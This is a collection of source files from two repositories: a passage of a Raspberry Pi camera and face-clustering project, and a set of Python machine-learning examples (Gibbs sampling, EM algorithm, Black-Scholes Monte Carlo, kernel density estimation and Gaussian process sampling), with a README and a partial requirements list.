arducam\nimport v4l2\nimport os\nimport errno\nimport time\nimport sys\n\ndef mkdirp(dir_name):\n try:\n os.makedirs(dir_name)\n except OSError as exc: \n if exc.errno == errno.EEXIST and os.path.isdir(dir_name):\n pass\n\nlog('loading config')\n\n# empty default configuration\nconfig = {\n 'exposure': 1600\n}\n\n# custom configuration overrides defaults\nwith open('config.json') as f:\n config.update(json.load(f))\n\nif len(sys.argv) > 1:\n config['exposure'] = int(sys.argv[1])\n print('overriding exposure with', config['exposure'])\n\nwidth, height = 4656, 3496\nprocessor = RawProcessor(width, height, mode='bgr')\n\nlog('connecting to camera')\ncamera = arducam.mipi_camera()\ncamera.init_camera()\n\nlog('setting resolution')\ncamera.set_resolution(width, height)\nlog('setting exposure and white balance')\ncamera.software_auto_exposure(enable=False)\ncamera.software_auto_white_balance(enable=False)\ncamera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\ncamera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\n# while True:\n# log('capturing')\n# frame = camera.capture(encoding='raw')\n\n# log('processing image')\n# img = processor(frame.as_array)\n\n# clipping = np.sum(img == 1023)\n# pixels = width * height * 3\n# ratio = float(clipping) / pixels\n# log('percent clipping:', 100*ratio)\n\n# if ratio < 0.0001:\n# break\n\n# config['exposure'] = int(0.9 * config['exposure'])\n# camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n# log('clipping, decreasing exposure to', config['exposure'])\n\nmkdirp('../reference')\npreview = np.zeros((height//4, width//4, 3), np.uint8)\nfor i, bracket in enumerate((1.0,)): #(0.80, 1.00, 1.20)):\n exposure = int(bracket * config['exposure'])\n# for i, exposure in enumerate((25600, 12800, 6400, 3200)):\n camera.set_control(v4l2.V4L2_CID_EXPOSURE, exposure)\n time.sleep(1)\n log('bracketed exposure ', i, '=', exposure)\n frame = camera.capture(encoding='raw')\n\n remove_padding_and_unpack_quarter_bgr_preview(frame.as_array, width, height, 10, preview.reshape(-1))\n zebra(preview.reshape(-1), width//4, height//4)\n cv2.imwrite('../reference/preview.jpg', preview)\n\n frame.as_array.tofile('../reference/' + str(exposure) + '.raw')\n\nlog('exiting')\ncamera.close_camera()" }, { "alpha_fraction": 0.5884543657302856, "alphanum_fraction": 0.6443203091621399, "avg_line_length": 16.933332443237305, "blob_id": "df53077ba1f7920b31b7d648e8991c9bf72a592c", "content_id": "6bdd819a3e38e19be7fb87e6e2ca44aa5b490700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 537, "license_type": "no_license", "max_line_length": 43, "num_lines": 30, "path": "/rpi/camera-functions.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# script configuration\nHOSTNAME_PREFIX=vibe-check-camera-\nHOSTNAME_SUFFIX=.local\nROOT_NAME=camera\n\n# automatically configured global variables\nSSH_FILE=\"$HOME/.ssh/id_rsa\"\nSCRIPT=`basename \"$0\"`\nif [ -z \"$IDS\" ]; then\n IDS=\"0 1 4 5 6 7 8 9 10 11\"\n # IDS=\"0 1 2 3 4 5 6 7 8 9 10 11\"\nfi\n\nfunction get_hostname() {\n ID=$1\n echo $HOSTNAME_PREFIX$ID\n}\n\nfunction get_address() {\n ID=$1\n echo `get_hostname $ID`$HOSTNAME_SUFFIX\n}\n\nfunction get_at() {\n ID=$1\n ADDRESS=`get_address $ID`\n echo pi@$ADDRESS\n}" }, { "alpha_fraction": 0.7267857193946838, "alphanum_fraction": 0.7392857074737549, "avg_line_length": 17.09677505493164, "blob_id": "d0344e42e431bcd16071e97f4b31998162ae84e6", "content_id": "cb9d45b63641248abdfb45f72f669255f394c1dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 560, "license_type": "no_license", "max_line_length": 71, "num_lines": 31, "path": "/app/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Frontend Server\n\n* https://flask.palletsprojects.com/en/1.1.x/installation/#installation\n* https://flask-pymongo.readthedocs.io/en/latest/\n\nWith virtual environment:\n\n```\n. venv/bin/activate\nexport FLASK_APP=app.py\nexport FLASK_ENV=development # debug\ncd app\npython app.py\n```\n\nWith Anaconda:\n\n```\nconda create -y --name vibe-check-app --no-default-packages python=3.7\nconda activate vibe-check-app\nconda install -y flask==1.1.2\npython app.py\n```\n\nOr from the yml file:\n\n```\nconda env create -f environment.yml\nconda activate vibe-check-app\npython app.py\n```" }, { "alpha_fraction": 0.6450381875038147, "alphanum_fraction": 0.6564885377883911, "avg_line_length": 20.91666603088379, "blob_id": "24a1aac787fb8152f3df58af469daaf325166a34", "content_id": "73f613df05253ae66507e76db4268f3f4975a451", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 262, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/database/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/sh\nmin_interval=60\nwhile true\ndo\n start=`date +%s`\n ~/miniconda3/envs/vibe-check-face/bin/python cluster.py\n end=`date +%s`\n duration=$((end-start))\n echo $duration\" second\"\n remaining=$((min_interval-duration))\n sleep $remaining\ndone" }, { "alpha_fraction": 0.6052948236465454, "alphanum_fraction": 0.6161251664161682, "avg_line_length": 29.77777862548828, "blob_id": "482a09aacc5eeb70a071ea8a1106e4f8da634e7a", "content_id": "8547c60736040f9f07940a91794012e8ac3f1670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1662, "license_type": "no_license", "max_line_length": 87, "num_lines": 54, "path": "/face/build-blocklist.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom collections import defaultdict\nimport pickle\nfrom blocking import face_to_features\n\ncamera_count = 12\nmin_samples = 20\nmax_features = 1000\n\nclient = MongoClient()\nblocklist = defaultdict(list)\n\nfor camera_id in range(camera_count):\n print(f'analyzing camera {camera_id}')\n \n features = []\n for e in client.vibecheck.raw.find({'camera_id': str(camera_id)}):\n for face in e['faces']:\n features.append(face_to_features(face))\n \n print(f' face features: {len(features)}')\n if len(features) == 0:\n print(' skipping...')\n continue\n\n if len(features) > max_features:\n np.random.shuffle(features)\n features = features[:max_features]\n print(f' limited features: {max_features}')\n \n features = np.asarray(features)\n clusterer = DBSCAN(min_samples=min_samples)\n labels = clusterer.fit_predict(features)\n unique = np.unique(labels[labels != -1])\n \n print(f' unique clusters: {len(unique)}')\n if len(unique) == 0:\n print(' skipping...')\n continue\n \n for label in unique:\n in_group = features[labels == label]\n out_group = features[labels != label]\n mean = in_group.mean(0)\n farthest = np.sqrt((in_group - mean) ** 2).sum(1).max()\n nearest = np.sqrt((out_group - mean) ** 2).sum(1).min()\n print(' ', label, 'farthest', round(farthest,2), 'nearest', round(nearest, 2))\n \n blocklist[str(camera_id)].append(mean)\n\nwith open('blocklist.pkl', 'wb') as f:\n pickle.dump(dict(blocklist), f)\n" } ]
36
nyk510/machine-learning
https://github.com/nyk510/machine-learning
2035c620881e84f5924b25ea2b022eb40430d370
a3f2ce93937a9394e4985a39e4190faeb50d7df2
fc1c5d9ba59eb3d3663b7119f4b09527490b7144
refs/heads/master
2020-03-29T06:30:28.418021
2017-07-10T12:01:07
2017-07-10T12:01:07
94,658,275
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5447960495948792, "alphanum_fraction": 0.5722455382347107, "avg_line_length": 29.858823776245117, "blob_id": "dc861fb866e814927a82f507219ec92fdbc7526e", "content_id": "11eadb272b800b91f8e0cdacacdeb6b6408046c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2829, "license_type": "no_license", "max_line_length": 105, "num_lines": 85, "path": "/gibbs_sampling.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\n\"\"\"\n\n# coding: UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\ndef gibbs_sampling(nu, cov, sample_size):\n \"\"\"\n ギブスサンプリングを用いて与えられた共分散, 平均値を持つ\n 多次元ガウス分布からのサンプリングを行う関数\n :param np.ndarray nu: 平均値\n :param np.ndarray cov: 共分散\n :param int sample_size: サンプリングする数\n :return:\n :rtype: np.ndarray\n \"\"\"\n samples = []\n n_dim = nu.shape[0]\n # start point of sampling\n start = [0, 0]\n samples.append(start)\n search_dim = 0\n\n for i in range(sample_size):\n if search_dim == n_dim - 1:\n \"\"\"\n search dimension selection is cyclic.\n it can be replaced random choice.\n \"\"\"\n search_dim = 0\n else:\n search_dim = search_dim + 1\n\n prev_sample = samples[-1][:]\n A = cov[search_dim][search_dim - 1] / float(cov[search_dim - 1][search_dim - 1]) # A*Σ_yy = Σ_xy\n _y = prev_sample[search_dim - 1] # previous values of other dimension\n\n # p(x|y) ~ N(x|nu[x]+A(_y-nu[y]),Σ_zz)\n # Σ_zz = Σ_xx - A0*Σ_yx\n\n mean = nu[search_dim] + A * (_y - nu[search_dim - 1])\n sigma_zz = cov[search_dim][search_dim] - A * cov[search_dim - 1][search_dim]\n\n sample_x = np.random.normal(loc=mean, scale=np.power(sigma_zz, .5), size=1)\n prev_sample[search_dim] = sample_x[0]\n samples.append(prev_sample)\n\n return np.array(samples)\n\n\nif __name__ == '__main__':\n # 2 dimension normal distribution\n nu = np.ones(2)\n covariance = np.array([[0.5, 0.5], [0.5, 3]])\n\n # eig_values: 固有値\n # eig_vectors: 固有ベクトル\n eig_values, eig_vectors = np.linalg.eig(covariance)\n average_eigs = np.average(eig_values)\n sample = gibbs_sampling(nu, covariance, 1000)\n\n fig, ax1 = plt.subplots(figsize=(6, 6))\n ax1.scatter(sample[:, 0], sample[:, 1],\n marker=\"o\", facecolor=\"none\", alpha=1., s=30., edgecolor=\"C0\", label=\"Samples\"\n )\n\n # 答え合わせ\n # scipy.stats を用いて多次元ガウス分布の確率密度関数を計算\n multi_norm = stats.multivariate_normal(mean=nu, cov=covariance)\n X, Y = np.meshgrid(np.linspace(nu[0] - average_eigs * 2, nu[0] + average_eigs * 2, 1000),\n np.linspace(nu[1] - average_eigs * 2, nu[1] + average_eigs * 2, 1000))\n Pos = np.empty(X.shape + (2,))\n Pos[:, :, 0] = X\n Pos[:, :, 1] = Y\n Z = multi_norm.pdf(Pos)\n ax1.contour(X, Y, Z, colors=\"C0\", label=\"True Probability Density Function\")\n ax1.legend()\n ax1.set_title(\"Gibbs Sampling\")\n fig.tight_layout()\n fig.savefig(\"figures/gibbs_sampling.png\", dpi=150)\n" }, { "alpha_fraction": 0.5349586009979248, "alphanum_fraction": 0.5827966928482056, "avg_line_length": 31.939393997192383, "blob_id": "d3635e4a4eaa10cb7c64025cd3c4c1a48974d4ab", "content_id": "8ded3a1be69a10d3d37d1722659c68840a791d6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2210, "license_type": "no_license", "max_line_length": 147, "num_lines": 66, "path": "/black_scholes.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\nブラック–ショールズ方程式\nhttps://ja.wikipedia.org/wiki/%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E2%80%93%E3%82%B7%E3%83%A7%E3%83%BC%E3%83%AB%E3%82%BA%E6%96%B9%E7%A8%8B%E5%BC%8F\n\"\"\"\n\n# encoding:UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n# 定数\nt = 0.\nS_0 = 100.\nK = 100.\nr = 0.03\nSIGMA = 0.30\nT = 1.\n\n# 解析解\nd = -(np.math.log(S_0 / K) + ((r - SIGMA * SIGMA / 2.) * T)) / (SIGMA * np.power(T, 0.5))\nV_c = S_0 * stats.norm.cdf(-d + SIGMA * np.power(T, .5)) - K * np.exp(-r * T) * stats.norm.cdf(-d)\nV_p = K * np.exp(-r * (T - t)) * stats.norm.cdf(d) - S_0 * stats.norm.cdf(d - SIGMA * np.power(T - t, 0.5))\n\n\ndef black_scholes_monte_carlo(repeat):\n rand_n = np.random.normal(size=repeat)\n s_j_t = S_0 * np.exp((r - SIGMA * SIGMA / 2.) * T + SIGMA * rand_n * np.power(T, 0.5))\n return (np.sum(s_j_t[s_j_t > S_0] - S_0)) / float(repeat) * np.exp(-r * T)\n\n\ndef price_monte_carlo(repeat):\n rand_n = np.random.normal(size=repeat)\n s_j_t = S_0 * np.exp((r - SIGMA * SIGMA / 2.) * T + SIGMA * rand_n * np.power(T, 0.5))\n return s_j_t\n\n\nif __name__ == '__main__':\n\n print(V_c, \"Call Option: Analytical Solution\")\n print(V_p, \"Put Option: Analytical Solution\")\n sol_list = []\n repeat_num = []\n for i in range(15):\n repeat = pow(2, i)\n monte_sol = black_scholes_monte_carlo(repeat)\n print(monte_sol, repeat, \"Monte Carlo Solution: d=\", V_c - monte_sol)\n sol_list.append(np.abs(V_c - monte_sol) / abs(V_c))\n repeat_num.append(repeat)\n plt.semilogx(repeat_num, sol_list)\n plt.yscale(\"log\")\n plt.xlabel(\"Num of Repeats\")\n plt.ylabel(\"Error Ratio\")\n plt.show()\n\n sample_num = 10000\n price = price_monte_carlo(sample_num)\n VaR = S_0 - np.percentile(price, 1)\n put_values = price[:]\n put_values[put_values > S_0] = S_0\n put_values = S_0 + S_0 - put_values\n put_VaR = S_0 + V_p - np.percentile(put_values, 1)\n monte_carlo_V_p = np.sum(put_values - S_0) / float(sample_num) * np.exp(-r * T)\n print(\"Put Option Value(monte carlo):\\t\", monte_carlo_V_p)\n print(\"default VaR:\\t\", VaR, \"\\r\\nput option VaR:\\t\", put_VaR)\n" }, { "alpha_fraction": 0.5430711507797241, "alphanum_fraction": 0.5589036345481873, "avg_line_length": 33.552940368652344, "blob_id": "df9f520c2a9e086238c50aec029bd7cf0a393b87", "content_id": "e6e9e188c44307a5ad7bcdd537d45071d0c8a2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6066, "license_type": "no_license", "max_line_length": 113, "num_lines": 170, "path": "/prml/em_algorithm.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\nEMアルゴリズム\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom logging import getLogger, StreamHandler\n\nlogger = getLogger(__name__)\nstream_hander = StreamHandler()\nlogger.setLevel(\"INFO\")\nstream_hander.setLevel(\"INFO\")\nlogger.addHandler(stream_hander)\n\n\nclass EMAlgorithm():\n def __init__(self, num_classes, features):\n \"\"\"\n constructor\n :param int num_classes: 分離するクラスの数. \n :param np.ndarray features:\n 特徴量データ. shape = (n_samples, n_dims)\n \"\"\"\n self.class_num = num_classes\n self.features = features\n n_samples, dim = features.shape\n\n self.n_dimensions = dim\n self.n_samples = n_samples\n\n # 混合係数\n self.responsibility = np.empty((self.n_samples, num_classes), dtype=float)\n self.nu_list = []\n self.sigma_list = []\n self.pi_list = []\n for i in range(num_classes):\n # 平均値はrandom_uniform,分散は単位行列\n self.nu_list.append(np.random.uniform(low=-1, high=1.0, size=dim))\n self.sigma_list.append(np.eye(dim))\n self.pi_list.append(1. / dim)\n\n self.n_iter = 0\n self.previous_likelihood = self.compute_log_likelihood()\n self.nu_path = []\n\n def _e_step(self):\n \"\"\"\n 混合係数の更新\n \"\"\"\n for n, coodinate in enumerate(self.features):\n resp = np.zeros(self.class_num) # 初期化\n for k in range(self.class_num):\n var = stats.multivariate_normal(mean=self.nu_list[k], cov=self.sigma_list[k])\n dense = var.pdf(coodinate)\n resp[k] = (self.pi_list[k] * dense)\n self.responsibility[n, :] = resp / sum(resp)\n return\n\n def _m_step(self):\n \"\"\"\n do m_step\n m_step is constructed 3 sequences.\n 1: update new nu_list\n 2: update new sigma_list using new nu_list\n 3: update new responsibility using old pi_list\n \"\"\"\n N_k_list = np.zeros(self.class_num)\n for k in range(self.class_num):\n N_k = sum(self.responsibility[:, k])\n N_k_list[k] = N_k\n\n # step1 update nu_list\n self.nu_path.append(self.nu_list[:])\n for k in range(self.class_num):\n new_nu = np.zeros(self.n_dimensions)\n for n in range(self.n_samples):\n new_nu += self.responsibility[n, k] * self.features[n, :]\n self.nu_list[k] = new_nu / N_k_list[k]\n\n # step2\n for k in range(self.class_num):\n new_sigma_k = np.zeros((self.n_dimensions, self.n_dimensions))\n for n in range(self.n_samples):\n array_x = (self.features[n, :] - self.nu_list[k])[:, np.newaxis] # ベクトルの転置計算のためにいったん行列に変形\n new_sigma_k += self.responsibility[n, k] * array_x.dot(array_x.T)\n self.sigma_list[k] = new_sigma_k / N_k_list[k]\n\n # step3\n for k in range(self.class_num):\n self.pi_list = N_k_list / sum(N_k_list)\n return\n\n def compute_log_likelihood(self):\n \"\"\"\n calculate log likelihood. using current nu,sigma,pi,and data\n \"\"\"\n retval = 0.\n for n in range(self.n_samples):\n inside_log = 0.\n for k in range(self.class_num):\n multi_n = stats.multivariate_normal(mean=self.nu_list[k], cov=self.sigma_list[k])\n dense_x = multi_n.pdf(self.features[n])\n inside_log += dense_x * self.pi_list[k]\n retval += np.log(inside_log)\n n_iter = self.n_iter\n logger.info(\"log-likelihood: {retval:.3f}\\titer: {n_iter}\".format(**locals()))\n return retval\n\n @property\n def is_terminated(self):\n \"\"\"\n whether the EM algorithm is terminated or not\n return: boolean\n \"\"\"\n e = 1e-5\n current_likelihood = self.compute_log_likelihood()\n dist = current_likelihood - self.previous_likelihood\n kaizen_ratio = np.abs(dist / current_likelihood)\n\n if kaizen_ratio < e:\n logger.info(\"Complete!\")\n return True\n self.previous_likelihood = current_likelihood\n return False\n\n def run(self, repeat=10, force_update=True):\n \"\"\"\n lunch algorithm\n doing while is_terminated is true or repeat times over setted repeat number\n :param int repeat: 繰り返し回数\n :param bool force_update: 更新を強制的に繰り返し回数だけ行うかどうか.\n :return:\n \"\"\"\n for i in range(1, repeat + 1):\n self._e_step()\n self._m_step()\n self.n_iter = i\n\n if (~force_update) and self.is_terminated:\n logger.info(\"objective is terminated\")\n return\n return\n\n\ndef generate_samples():\n sample = np.random.multivariate_normal(mean=[0.5, 0], cov=np.array([[13, -9], [-27, 31]]) / 400., size=100)\n sample2 = np.random.multivariate_normal(mean=[0., 0.], cov=np.array([[5, 3], [3, 5]]) / 40., size=200)\n sample3 = np.random.multivariate_normal(mean=[-1, -0.], cov=np.array([[13, -9], [-27, 31]]) / 400., size=100)\n data = np.vstack([sample, sample2, sample3])\n return data\n\n\nif __name__ == '__main__':\n data = generate_samples()\n model = EMAlgorithm(3, data)\n model.run(repeat=100)\n plt.scatter(data[:, 0], data[:, 1], s=40, c=model.responsibility, alpha=.5, facecolors='none',\n edgecolor=model.responsibility)\n # plt.plot(np.array(em_alg.nu_list)[:, 0], np.array(em_alg.nu_list)[:, 1], \"rh\", markersize=10)\n path = np.array(model.nu_path)\n for k in range(model.class_num):\n c = [0, 0, 0]\n c[k] = 1\n plt.plot(path[:, k, 0], path[:, k, 1], \"*-\", color=c, label=\"class{k} center\".format(**locals()))\n plt.legend()\n plt.savefig(\"../figures/em_algorithm.png\", dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.7392491698265076, "alphanum_fraction": 0.7474402785301208, "avg_line_length": 21.538461685180664, "blob_id": "60a0a32da32271810d1759ee691257a048947171", "content_id": "6f2f2013821e50ff515795543c830590b466f107", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2519, "license_type": "no_license", "max_line_length": 68, "num_lines": 65, "path": "/readme.md", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# Machine Learning\n\n機械学習に関する python ファイルをまとめていくリポジトリ.\n\n## 環境\n\n* Python 3.6.0 :: Anaconda 4.3.0 (x86_64)\n\n## requirements\n\n* numpy\n* scipy\n* scikit-learn\n* matplotlib\n\n## Contents\n\n### サンプリング\n\n#### [gibbs sampling による多次元ガウス分布のサンプリング](gibbs_sampling.py)\n\n二次元ガウス分布に対するギブスサンプリング\n\n![](./figures/gibbs_sampling.png)\n\n### PRML\n\n#### [カーネル密度推定](./prml/density_estimation.py)\n\n一次元データ(図中でヒストグラムで表現されている)に対してカーネル幅の異なるカーネルを用いたときの密度推定の可視化\n![](./figures/density_estimation.png)\n\n#### [線形回帰モデルに対するエビデンス最大化](./prml/linear_regression.py)\nエビデンス最大化を用いた、線形回帰モデルの精度パラメータ及び重みの事前分布を決める係数の最適化。\n最適化を行った予測(左図)では、Map推定(右図)したときのように過学習しない様子を可視化しています。\n![](./figures/linear_regression_max-evidence_vs_normal-map.png)\n\n#### [ガウス過程 > 事前分布](./prml/gaussian_process_prior.py)\n\nガウス過程でデータが得られていないときの重みの事前分布からの確率過程のサンプリング\n![](./figures/gp_prior.png)\n\n#### [ガウス過程 > 新しいデータに対する予測](./prml/gaussian_process_estimation.py)\nガウス過程に基づく予測。\nデータが増えると予測の分散も減っていく様子を可視化しています。\n![](./figures/gp-estimation_by_training_data.png)\n\n#### [RVM (Relevant Vector Machine)](./prml/rvm.py)\n信頼ベクトルマシン(RVM)を用いた予測。\nプラスして信頼区間、およびサポートベクトルも表示\b。\n![](./figures/rvm_predict.png)\n\n#### [EM Algorithm](./prml/em_algorithm.py)\nEMアルゴリズムを用いた教師なし学習。\nデータは3つの平均と分散の異なる二次元ガウス分布から生成し、それを3つのクラスタに分類。\n![](./figures/em_algorithm.png)\n\n#### [Variance Inference](./prml/variance_inference.py)\n\n線形回帰モデルに対するエビデンス最大化の発展で、代わりに変分推論を行った結果の可視化。(あまり綺麗に結果に出ていないので今後治したい…)\n![](./figures/iter_update_beta.png)\n\n### その他\n\n* [black sholes 方程式](./black_scholes.py)\n" }, { "alpha_fraction": 0.5104318261146545, "alphanum_fraction": 0.5351771116256714, "avg_line_length": 25.088607788085938, "blob_id": "a7158dadd7fea8cb37da239ea8ff6a7142a8e9df", "content_id": "74a6d3163e05091f7cb0afd37df1c5f7d30d1d76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2083, "license_type": "no_license", "max_line_length": 94, "num_lines": 79, "path": "/prml/density_estimation.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nカーネル密度推定\n@section 2\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\n\n\nclass KernelEstimation():\n def __init__(self, h, dist, kernel):\n self.h = h\n self.dist = dist\n self.kernel = kernel\n\n self.data = None\n self.norm_ratio = None\n\n def __str__(self):\n s = \"kernel: {0.kernel} h: {0.h:.2f}\".format(self)\n return s\n\n def _kernel(self, d):\n \"\"\"\n return kernel distance\n \"\"\"\n if self.kernel == \"gaussian\":\n norm = np.linalg.norm(d)\n return np.exp(- norm ** 2. / (2. * self.h ** 2.))\n return 0\n\n def _calculate_normalization_ratio(self):\n \"\"\"\n calculate normalization ratio\n \"\"\"\n if self.kernel == \"gaussian\":\n return 1 / np.power((2 * self.h ** 2. * np.pi), (self.dist / 2.)) / self.data.size\n else:\n return 0\n\n def fit(self, X):\n self.data = X\n self.norm_ratio = self._calculate_normalization_ratio()\n return\n\n def predict(self, x):\n \"\"\"\n predict by kernel estimate\n \"\"\"\n x = np.asarray(x)\n prob = np.zeros_like(x)\n for i in range(x.size):\n for k in range(self.data.size):\n prob[i] += self._kernel(x[i] - self.data[k])\n return prob * self.norm_ratio\n\n\nif __name__ == '__main__':\n np.random.seed(19)\n rv = multivariate_normal(1, 1)\n x = np.linspace(-5, 5, 100)\n\n fig = plt.figure(figsize=(10, 6))\n ax1 = fig.add_subplot(111)\n ax1.plot(x, rv.pdf(x), \"-\", color=\"C0\", label=\"True Density Function\")\n samples = rv.rvs(100) # sampleの生成\n ax1.hist(samples, normed=True, facecolor='C0', alpha=0.3)\n\n for h in np.logspace(-1., .5, num=5):\n model = KernelEstimation(h, 1., \"gaussian\")\n model.fit(samples)\n preds = model.predict(x)\n ax1.plot(x, preds, \"--\", label=str(model))\n ax1.legend()\n fig.savefig(\"density_estimation.png\", dpi=150)\n" }, { "alpha_fraction": 0.5204333066940308, "alphanum_fraction": 0.5637617111206055, "avg_line_length": 30.24615478515625, "blob_id": "11f57489cc7699f318bb9b94be582ffd716cc1a0", "content_id": "f984e0d1fafd0225508c4c0b812a7c19d5e3045f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2217, "license_type": "no_license", "max_line_length": 119, "num_lines": 65, "path": "/prml/gaussian_process_prior.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"yamaguchi\"\n\"\"\"\n6.4 ガウス過程の事前分布からのサンプリング\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Kernel(object):\n \"\"\"\n カーネル関数\n \"\"\"\n\n def __init__(self, theta1, theta2, theta3, theta4, kernel_type=\"gaussian\"):\n \"\"\"\n kernel = Θ1*exp(-Θ2/2*||x1-x2||^2) + Θ3 + Θ4*<x1|x2>\n\n :param str kernel_type: カーネルの種類を表す文字列. gaussian | ornstein を指定.\n \"\"\"\n self.theta1 = theta1\n self.theta2 = theta2\n self.theta3 = theta3\n self.theta4 = theta4\n self.kernel_type = kernel_type\n\n def _kernel(self, x1, x2):\n if self.kernel_type == \"gaussian\":\n return np.exp(-self.theta2 / 2. * np.inner(x1 - x2, x1 - x2))\n if self.kernel_type == \"ornstein\": # オルンシュタインウーレンベック過程\n return np.exp(-self.theta2 * np.power(np.inner(x1 - x2, x1 - x2), .5))\n\n def __call__(self, x1, x2):\n \"\"\"\n calculate kernel\n x1,x2: numpy.array, has same dimension\n \"\"\"\n val = self.theta1 * self._kernel(x1, x2) + self.theta3 + self.theta4 * (np.inner(x1, x2))\n return val\n\n def __str__(self):\n s = \"type={0.kernel_type}_theta1={0.theta1}_theta2={0.theta2}_theta3={0.theta3}_theta4={0.theta4}\".format(self)\n return s\n\n\nif __name__ == '__main__':\n\n kernel1 = Kernel(1, 10., 1., 0., kernel_type=\"gaussian\")\n num_of_spans = 200 # 離散化する数 増やせばなめらかさは増しますが、計算コストも増えます。\n\n gram_matrix = np.identity(num_of_spans)\n x_range = np.linspace(-1, 1, num_of_spans)\n for i in range(num_of_spans):\n for k in range(num_of_spans):\n x1 = x_range[i]\n x2 = x_range[k]\n gram_matrix[i][k] = kernel1(np.array([x1]), np.array([x2]))\n color = [\"C{i}\".format(**locals()) for i in range(3)]\n for i in range(10):\n y = np.random.multivariate_normal(np.zeros(num_of_spans), gram_matrix, 1)\n plt.plot(x_range, y[0], color[i % len(color)])\n plt.title(str(kernel1))\n plt.savefig(\"../figures/gp_prior.png\", dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.4882989823818207, "alphanum_fraction": 0.6898358464241028, "avg_line_length": 15.175141334533691, "blob_id": "4fef3330b845deafe3ab4e4f36f7f06d6912ba22", "content_id": "91c5a085e49c09d4882a6f6a8feab6ab6f2c38ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2863, "license_type": "no_license", "max_line_length": 41, "num_lines": 177, "path": "/requirements.txt", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "alabaster==0.7.9\nanaconda-client==1.6.0\nanaconda-navigator==1.4.3\nappdirs==1.4.3\nappnope==0.1.0\nappscript==1.0.1\nastroid==1.4.9\nastropy==1.3\nautopep8==1.3.1\nBabel==2.3.4\nbackports.shutil-get-terminal-size==1.0.0\nbeautifulsoup4==4.5.3\nbitarray==0.8.1\nblaze==0.10.1\nbokeh==0.12.4\nboto==2.45.0\nBottleneck==1.2.0\nbz2file==0.98\ncffi==1.9.1\nchainer==1.24.0\nchardet==2.3.0\nchest==0.2.3\nclick==6.7\ncloudpickle==0.2.2\nclyent==1.2.2\ncolorama==0.3.7\nCommonMark==0.5.4\nconda==4.3.18\nconfigobj==5.0.6\ncontextlib2==0.5.4\ncryptography==1.7.1\ncycler==0.10.0\nCython==0.25.2\ncytoolz==0.8.2\ndask==0.13.0\ndatashape==0.5.4\ndecorator==4.0.11\ndill==0.2.5\ndocutils==0.13.1\net-xmlfile==1.0.1\nfastcache==1.0.2\nfilelock==2.0.8\nflake8==3.3.0\nFlask==0.12\nFlask-Cors==3.0.2\nfuture==0.16.0\ngensim==1.0.1\ngevent==1.2.1\nGPy==1.6.1\ngreenlet==0.4.11\nh5py==2.6.0\nHeapDict==1.0.0\nidna==2.2\nimagesize==0.7.1\nipdb==0.10.3\nipykernel==4.5.2\nipython==5.1.0\nipython-genutils==0.2.0\nipywidgets==5.2.2\nisort==4.2.5\nitsdangerous==0.24\njdcal==1.3\njedi==0.9.0\nJinja2==2.9.4\njoblib==0.11\njsonschema==2.5.1\njupyter==1.0.0\njupyter-client==4.4.0\njupyter-console==5.0.0\njupyter-core==4.3.0\njupyterthemes==0.15.9\nKeras==2.0.4\nlanguage-check==1.0\nlazy-object-proxy==1.2.2\nlesscpy==0.12.0\nllvmlite==0.15.0\nlocket==0.2.0\nlxml==3.7.2\nMarkupSafe==0.23\nmatplotlib==2.0.0\nmccabe==0.6.1\nmecab-python3==0.7\nmistune==0.7.3\nmpmath==0.19\nmultipledispatch==0.4.9\nmysqlclient==1.3.10\nnbconvert==4.2.0\nnbformat==4.2.0\nnbsphinx==0.2.13\nnetworkx==1.11\nnltk==3.2.4\nnose==1.3.7\nnotebook==4.3.1\nnumba==0.30.1